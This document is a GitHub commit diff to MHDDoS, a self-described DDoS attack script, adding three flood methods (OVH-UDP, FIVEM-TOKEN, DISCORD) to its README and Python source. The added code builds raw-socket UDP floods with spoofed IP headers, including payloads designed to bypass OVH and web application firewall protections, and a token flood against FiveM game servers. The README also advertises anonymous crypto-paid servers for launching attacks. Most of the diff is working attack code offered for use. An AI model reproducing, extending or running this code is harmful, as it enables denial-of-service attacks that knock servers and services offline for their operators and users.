This commit is contained in:
cirqueira 2025-06-30 16:33:14 +08:00 committed by GitHub
commit 54ff698675
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
2 changed files with 93 additions and 7 deletions

View File

@ -1,4 +1,4 @@
<h1 align="center">MHDDoS - DDoS Attack Script With 56 Methods</h1>
<h1 align="center">MHDDoS - DDoS Attack Script With 58 Methods</h1>
<em><h5 align="center">(Programming Language - Python 3)</h5></em>
<p align="center">
@ -49,12 +49,15 @@
* <img src="https://raw.githubusercontent.com/kgretzky/pwndrop/master/media/pwndrop-logo-512.png" width="16" height="16" alt="tcp"> TCP | TCP Flood Bypass
* <img src="https://styles.redditmedia.com/t5_2rxmiq/styles/profileIcon_snoob94cdb09-c26c-4c24-bd0c-66238623cc22-headshot.png" width="16" height="16" alt="udp"> UDP | UDP Flood Bypass
* <img src="https://cdn-icons-png.flaticon.com/512/1918/1918576.png" width="16" height="16" alt="syn"> SYN | SYN Flood
* <img src="https://static-00.iconduck.com/assets.00/ovh-icon-2048x2048-l4c3izvg.png" width="16" height="16" alt="ovh"> OVH-UDP | UDP flood with random HTTP headers and binary payload to bypass OVH and WAFs.
* <img src="https://cdn-icons-png.flaticon.com/512/1017/1017466.png" width="16" height="16" alt="cps"> CPS | Open and close connections with proxy
* <img src="https://icon-library.com/images/icon-ping/icon-ping-28.jpg" width="16" height="16" alt="icmp"> ICMP | Icmp echo request flood (Layer3)
* <img src="https://s6.uupload.ir/files/1059643_g8hp.png" width="16" height="16" alt="connection"> CONNECTION | Open connection alive with proxy
* <img src="https://ia803109.us.archive.org/27/items/source-engine-video-projects/source-engine-video-projects_itemimage.png" width="16" height="16" alt="vse"> VSE | Send Valve Source Engine Protocol
* <img src="https://mycrackfree.com/wp-content/uploads/2018/08/TeamSpeak-Server-9.png" width="16" height="16" alt="teamspeak 3"> TS3 | Send Teamspeak 3 Status Ping Protocol
* <img src="https://cdn2.downdetector.com/static/uploads/logo/75ef9fcabc1abea8fce0ebd0236a4132710fcb2e.png" width="16" height="16" alt="fivem"> FIVEM | Send FiveM Status Ping Protocol
* <img src="https://github.com/user-attachments/assets/f40748bf-dd28-4294-b862-cb0acbc74eea" width="16" height="16" alt="fivem-token"> FIVEM-TOKEN | Send FiveM confirmation token flood
* <img src="https://cdn.prod.website-files.com/6257adef93867e50d84d30e2/678a4c12dbf6be5d792aa920_Clyde%20Cube.webp" width="16" height="16" alt="udp"> DISCORD | Send RAW packet flood with custom payload
* <img src="https://cdn.iconscout.com/icon/free/png-512/redis-4-1175103.png" width="16" height="16" alt="mem"> MEM | Memcached Amplification
* <img src="https://lyrahosting.com/wp-content/uploads/2020/06/ddos-attack-icon.png" width="16" height="16" alt="ntp"> NTP | NTP Amplification
* <img src="https://cdn-icons-png.flaticon.com/512/4712/4712139.png" width="16" height="16" alt="mcbot"> MCBOT | Minecraft Bot Attack
@ -147,4 +150,4 @@ apt -y update && apt -y install curl wget libcurl4 libssl-dev python3 python3-pi
<a href="https://aeza.net/?ref=375036"><img src="https://github.com/user-attachments/assets/f875428b-cb35-442d-8dce-cdc5ead4ffbd" width="728" height="90" alt="aeza"></a>
#### You can buy an hourly 10Gbps server from [Aeza Hosting](https://aeza.net/?ref=375036) with crypto (100% anonymous).
#### You can buy an hourly 10Gbps server from [Aeza Hosting](https://aeza.net/?ref=375036) with crypto (100% anonymous).

View File

@ -10,7 +10,7 @@ from multiprocessing import RawValue
from os import urandom as randbytes
from pathlib import Path
from re import compile
from random import choice as randchoice
from random import choice as randchoice, randint
from socket import (AF_INET, IP_HDRINCL, IPPROTO_IP, IPPROTO_TCP, IPPROTO_UDP, SOCK_DGRAM, IPPROTO_ICMP,
SOCK_RAW, SOCK_STREAM, TCP_NODELAY, gethostbyname,
gethostname, socket)
@ -127,8 +127,8 @@ class Methods:
LAYER4_METHODS: Set[str] = {*LAYER4_AMP,
"TCP", "UDP", "SYN", "VSE", "MINECRAFT",
"MCBOT", "CONNECTION", "CPS", "FIVEM",
"TS3", "MCPE", "ICMP"
"MCBOT", "CONNECTION", "CPS", "FIVEM", "FIVEM-TOKEN",
"TS3", "MCPE", "ICMP", "DISCORD", "OVH-UDP",
}
ALL_METHODS: Set[str] = {*LAYER4_METHODS, *LAYER7_METHODS}
@ -400,6 +400,9 @@ class Layer4(Thread):
"TS3": self.TS3,
"MCPE": self.MCPE,
"FIVEM": self.FIVEM,
"FIVEM-TOKEN": self.FIVEMTOKEN,
"OVH-UDP": self.OVHUDP,
"DISCORD": self.DISCORD,
"MINECRAFT": self.MINECRAFT,
"CPS": self.CPS,
"CONNECTION": self.CONNECTION,
@ -470,6 +473,14 @@ class Layer4(Thread):
continue
Tools.safe_close(s)
def OVHUDP(self) -> None:
with socket(AF_INET, SOCK_RAW, IPPROTO_UDP) as s:
s.setsockopt(IPPROTO_IP, IP_HDRINCL, 1)
while True:
for payload in self._generate_ovhudp():
Tools.sendto(s, payload, self._target)
Tools.safe_close(s)
def ICMP(self) -> None:
payload = self._genrate_icmp()
s = None
@ -489,8 +500,7 @@ class Layer4(Thread):
def AMP(self) -> None:
s = None
with suppress(Exception), socket(AF_INET, SOCK_RAW,
IPPROTO_UDP) as s:
with suppress(Exception), socket(AF_INET, SOCK_RAW, IPPROTO_UDP) as s:
s.setsockopt(IPPROTO_IP, IP_HDRINCL, 1)
while Tools.sendto(s, *next(self._amp_payloads)):
continue
@ -528,6 +538,32 @@ class Layer4(Thread):
continue
Tools.safe_close(s)
def DISCORD(self) -> None:
payload = self._generate_discord()
with socket(AF_INET, SOCK_RAW, IPPROTO_UDP) as s:
s.setsockopt(IPPROTO_IP, IP_HDRINCL, 1)
while Tools.sendto(s, payload, self._target):
continue
Tools.safe_close(s)
def FIVEMTOKEN(self) -> None:
global BYTES_SEND, REQUESTS_SENT
# Generete token and guid
token = str(uuid4())
steamid_min = 76561197960265728
steamid_max = 76561199999999999
guid = str(randint(steamid_min, steamid_max))
# Build Payload
payload_str = f"token={token}&guid={guid}"
payload = payload_str.encode('utf-8')
with socket(AF_INET, SOCK_DGRAM) as s:
while Tools.sendto(s, payload, self._target):
continue
Tools.safe_close(s)
def FIVEM(self) -> None:
global BYTES_SEND, REQUESTS_SENT
payload = b'\xff\xff\xff\xffgetinfo xxx\x00\x00\x00'
@ -555,6 +591,53 @@ class Layer4(Thread):
continue
Tools.safe_close(s)
def _generate_ovhudp(self) -> List[bytes]:
packets = []
methods = ["PGET", "POST", "HEAD", "OPTIONS", "PURGE"]
paths = ['/0/0/0/0/0/0', '/0/0/0/0/0/0/', '\\0\\0\\0\\0\\0\\0', '\\0\\0\\0\\0\\0\\0\\', '/', '/null', '/%00%00%00%00']
for _ in range(randint(2, 4)):
ip = IP()
ip.set_ip_src(__ip__)
ip.set_ip_dst(self._target[0])
udp = UDP()
udp.set_uh_sport(randint(1024, 65535))
udp.set_uh_dport(self._target[1])
payload_size = randint(1024, 2048)
random_part = randbytes(payload_size).decode("latin1", "ignore")
method = randchoice(methods)
path = randchoice(paths)
payload_str = (
f"{method} {path}{random_part} HTTP/1.1\n"
f"Host: {self._target[0]}:{self._target[1]}\r\n\r\n"
)
payload = payload_str.encode("latin1", "ignore")
udp.contains(Data(payload))
ip.contains(udp)
packets.append(ip.get_packet())
return packets
def _generate_discord(self) -> bytes:
ip: IP = IP()
ip.set_ip_src(__ip__)
ip.set_ip_dst(self._target[0])
udp: UDP = UDP()
udp.set_uh_sport(ProxyTools.Random.rand_int(32768, 65535))
udp.set_uh_dport(self._target[1])
payload_data = bytes([ProxyTools.Random.rand_int(0, 255) for _ in range(40)])
udp.contains(Data(payload_data))
ip.contains(udp)
return ip.get_packet()
def _genrate_syn(self) -> bytes:
ip: IP = IP()
ip.set_ip_src(__ip__)